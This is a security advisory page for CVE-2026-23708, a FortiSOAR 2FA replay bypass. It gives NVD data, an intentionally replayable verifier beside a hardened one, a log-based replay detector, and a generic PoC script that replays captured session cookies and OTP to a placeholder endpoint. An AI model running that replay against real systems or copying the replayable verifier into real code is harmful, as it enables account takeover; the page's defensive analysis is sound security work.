Security Vulnerability Report
CVE-2026-23708 CVSS 7.5 HIGH

Published: 2026-04-14 16:16:37
Last Modified: 2026-05-06 15:48:38

Description

An improper authentication vulnerability in Fortinet FortiSOAR PaaS 7.6.0 through 7.6.3, FortiSOAR PaaS 7.5.0 through 7.5.2, FortiSOAR on-premise 7.6.0 through 7.6.3, and FortiSOAR on-premise 7.5.0 through 7.5.2 may allow an unauthenticated attacker to bypass authentication by replaying a captured 2FA request. The attack requires being able to intercept and decrypt authentication traffic, and precise timing to replay the request before token expiration, which raises the attack complexity.

Weaknesses recorded in the NVD entry: CWE-287 (Improper Authentication) and CWE-862 (Missing Authorization). The security-relevant point is that the second factor is accepted as long as its token is unexpired, with nothing that makes the request single-use or ties it to the login session that started it; the only thing protecting the user is the length of the expiry window and the attacker's need to get a decrypted copy of the request inside it.
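The following is an added example, not FortiSOAR code and not derived from the advisory: a minimal server-side verifier with the replayable shape the description implies (only OTP and expiry are checked, so a captured request keeps working until the TTL runs out) next to a hardened one that consumes the challenge on first use, binds it to the issuing session, and keeps the TTL short, plus a simulation of the victim-then-attacker sequence. Every class, field, user and session name here is this example's own assumption.

```python
import hmac
import secrets
import time
from dataclasses import dataclass


@dataclass
class Challenge:
    """One outstanding 2FA challenge. Field names are this example's own."""
    user: str
    session_id: str      # login session the challenge was issued to
    otp: str             # code the user is expected to submit
    issued_at: float
    ttl: float = 60.0    # seconds the challenge stays valid (assumed value)


class ReplayableVerifier:
    """Vulnerable pattern: a captured (token, otp) pair verifies again and
    again until the TTL expires, which is exactly the replay window."""

    def __init__(self):
        self._challenges = {}

    def issue(self, user, session_id, now=None):
        now = time.time() if now is None else now
        token = secrets.token_urlsafe(16)
        otp = f"{secrets.randbelow(10**6):06d}"
        self._challenges[token] = Challenge(user, session_id, otp, now)
        return token, otp

    def verify(self, token, otp, session_id, now=None):
        now = time.time() if now is None else now
        ch = self._challenges.get(token)          # never removed: stays replayable
        if ch is None or now - ch.issued_at > ch.ttl:
            return False
        return hmac.compare_digest(ch.otp, otp)   # session binding is never checked


class SingleUseVerifier(ReplayableVerifier):
    """Hardened pattern: the challenge is consumed on the first attempt
    (success or failure), bound to the issuing session, and short-lived."""

    def verify(self, token, otp, session_id, now=None):
        now = time.time() if now is None else now
        ch = self._challenges.pop(token, None)    # single use: gone after one attempt
        if ch is None or now - ch.issued_at > ch.ttl:
            return False
        if not hmac.compare_digest(ch.session_id, session_id):
            return False                          # replay from another session fails
        return hmac.compare_digest(ch.otp, otp)


def simulate_replay(verifier_cls, delay=5.0):
    """Victim completes 2FA; the attacker replays the captured request from a
    fresh session `delay` seconds later. Returns (victim_ok, attacker_ok)."""
    v = verifier_cls()
    t0 = 1_000_000.0                              # constructed clock, not wall time
    token, otp = v.issue("alice", "victim-session", now=t0)
    victim_ok = v.verify(token, otp, "victim-session", now=t0 + 1)
    attacker_ok = v.verify(token, otp, "attacker-session", now=t0 + 1 + delay)
    return victim_ok, attacker_ok


if __name__ == "__main__":
    print("replayable:          ", simulate_replay(ReplayableVerifier))             # (True, True)
    print("single-use:          ", simulate_replay(SingleUseVerifier))              # (True, False)
    print("replayable after TTL:", simulate_replay(ReplayableVerifier, delay=120))  # (True, False)
```

The third line of output is the "precise timing" caveat from the description made concrete: against the replayable verifier the attacker only loses if the replay lands after the TTL, so the defence is the TTL alone. The hardened verifier pops the challenge before any comparison, so even a failed attempt burns it and a second submission of the same token from any session is rejected.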

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

The 7.5 score is the secondary assessment in the NVD record, which sets User Interaction to Required. The primary assessment uses UI:N (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) and scores 8.1 HIGH; both vectors appear in the raw JSON below. Attack Complexity is High in both because the attacker must first obtain a decrypted copy of the 2FA request and then replay it inside the token's lifetime.

Configurations (Affected Products)

cpe:2.3:a:fortinet:fortisoar:*:*:*:*:*:*:*:* - versions from 7.5.0 up to but excluding 7.5.3 - VULNERABLE
cpe:2.3:a:fortinet:fortisoar:*:*:*:*:*:*:*:* - versions from 7.6.0 up to but excluding 7.6.4 - VULNERABLE
FortiSOAR PaaS 7.6.0 - 7.6.3
FortiSOAR PaaS 7.5.0 - 7.5.2
FortiSOAR on-premise 7.6.0 - 7.6.3
FortiSOAR on-premise 7.5.0 - 7.5.2

The CPE ranges stop before 7.5.3 and 7.6.4, so those are the first releases in each branch that the NVD record does not mark vulnerable; confirm the fixed versions against the vendor advisory FG-IR-26-101 before closing a ticket.

PoC / Exploit Code

⚠ For Security Research Only
The following script is for security research and authorized testing only. It is a generic replay skeleton, not a confirmed exploit: the endpoint path is marked as an example in the script's own comments, and nothing on this page confirms the header or JSON field names against the real FortiSOAR 2FA endpoint. Any authorized test must be driven from a request actually captured in the engagement.
python
import requests
import urllib3

# The script disables certificate verification below; silence the resulting warning.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Target URL (example)
target_url = "https://<fortisoar_host>/api/auth/2fa/verify"

# Captured Cookie and Token from intercepted traffic
# Attacker obtained this by decrypting HTTPS traffic
captured_headers = {
    "Cookie": "session_id=compromised_session_id; csrf_token=compromised_csrf",
    "X-CSRF-Token": "compromised_csrf",
    "Content-Type": "application/json",
}

# The payload containing the replayed 2FA code/token
replay_payload = {
    "otp": "123456",                   # The valid OTP captured from the victim
    "token": "captured_replay_token",  # Placeholder for the captured challenge token
}

try:
    # Replay the request before the token expires
    response = requests.post(
        target_url,
        headers=captured_headers,
        json=replay_payload,
        verify=False,
        timeout=10,
    )
    if response.status_code == 200:
        print("[+] 2FA Bypass successful! Session established.")
        try:
            print("[+] Response:", response.json())
        except ValueError:
            print("[+] Response (non-JSON):", response.text)
    else:
        print("[-] Bypass failed. Token may be expired or invalid.")
        print("[-] Status Code:", response.status_code)
except Exception as e:
    print(f"[!] Error during replay attack: {e}")
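On the detection side, the same property that makes the replay work, one accepted 2FA token seen more than once within its lifetime, is what a SOC can alert on. The following is an added example, not a FortiSOAR feature and not its log format: a parser for constructed access-log lines (the line format, the /api/auth/2fa/verify path reused from the placeholder script above, and every host, user, session and token value are this example's assumptions) and a rule that flags a token accepted a second time within a window, recording whether the second acceptance came from a different session or source address.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log lines in an assumed key=value format. Line 3 is the replay:
# the token accepted for alice at 10:00:01 is accepted again six seconds later
# from a different source and session. Line 5 is a rejected reuse (status 401)
# and must not alert.
SAMPLE_LOG = """\
2026-04-14T10:00:01Z src=203.0.113.10 user=alice session=s-victim path=/api/auth/2fa/verify token=tok-A1 status=200
2026-04-14T10:00:03Z src=203.0.113.10 user=alice session=s-victim path=/api/cases token=- status=200
2026-04-14T10:00:07Z src=198.51.100.7 user=alice session=s-other path=/api/auth/2fa/verify token=tok-A1 status=200
2026-04-14T10:05:00Z src=203.0.113.22 user=bob session=s-bob path=/api/auth/2fa/verify token=tok-B9 status=200
2026-04-14T10:06:30Z src=203.0.113.22 user=bob session=s-bob path=/api/auth/2fa/verify token=tok-B9 status=401
"""

# Assumed 2FA verification path (placeholder, same as the script above).
VERIFY_PATH = "/api/auth/2fa/verify"

LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) session=(?P<session>\S+) "
    r"path=(?P<path>\S+) token=(?P<token>\S+) status=(?P<status>\d+)$"
)


def parse(log_text):
    """Turn the constructed log format into dicts; unparseable lines are skipped."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["ts"] = datetime.strptime(e["ts"], "%Y-%m-%dT%H:%M:%SZ")
        e["status"] = int(e["status"])
        events.append(e)
    return events


def find_replays(events, window=timedelta(seconds=90)):
    """Alert when one 2FA token is accepted (status 200) more than once within
    `window` of its first acceptance. A second acceptance from a different
    session or source address is the strongest indicator of replay."""
    accepted = defaultdict(list)
    for e in events:
        if e["path"] == VERIFY_PATH and e["status"] == 200 and e["token"] != "-":
            accepted[e["token"]].append(e)

    alerts = []
    for token, uses in accepted.items():
        uses.sort(key=lambda e: e["ts"])
        first = uses[0]
        for later in uses[1:]:
            if later["ts"] - first["ts"] <= window:
                alerts.append({
                    "token": token,
                    "user": first["user"],
                    "first_src": first["src"],
                    "replay_src": later["src"],
                    "cross_session": later["session"] != first["session"],
                    "cross_source": later["src"] != first["src"],
                    "delta_s": (later["ts"] - first["ts"]).total_seconds(),
                })
    return alerts


if __name__ == "__main__":
    for a in find_replays(parse(SAMPLE_LOG)):
        print(a)
```

The window should be set to the token lifetime of the deployment being monitored: anything accepted twice inside that lifetime is either a replay or an application that does not enforce single use, and both are worth a look. A 401 on reuse, as in the last sample line, is what a fixed verifier produces and is deliberately not counted.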

References

https://fortiguard.fortinet.com/psirt/FG-IR-26-101 (Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-23708",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-14T16:16:37.277",
    "lastModified": "2026-05-06T15:48:38.383",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A improper authentication vulnerability in Fortinet FortiSOAR PaaS 7.6.0 through 7.6.3, FortiSOAR PaaS 7.5.0 through 7.5.2, FortiSOAR on-premise 7.6.0 through 7.6.3, FortiSOAR on-premise 7.5.0 through 7.5.2 may allow an unauthenticated attacker to bypass authentication via replaying captured 2FA request. The attack requires being able to intercept and decrypt authentication traffic and precise timing to replay the request before token expiration, which raises the attack complexity."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.6,
          "impactScore": 5.9
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.2,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-287"}]},
      {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisoar:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.5.0", "versionEndExcluding": "7.5.3", "matchCriteriaId": "43966D08-F9B9-4CCA-BE32-649C1F08B905"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisoar:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.6.0", "versionEndExcluding": "7.6.4", "matchCriteriaId": "6E11F916-A349-4C7F-8F39-2A3C9F2FB006"}
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://fortiguard.fortinet.com/psirt/FG-IR-26-101", "source": "[email protected]", "tags": ["Vendor Advisory"]}
    ]
  }
}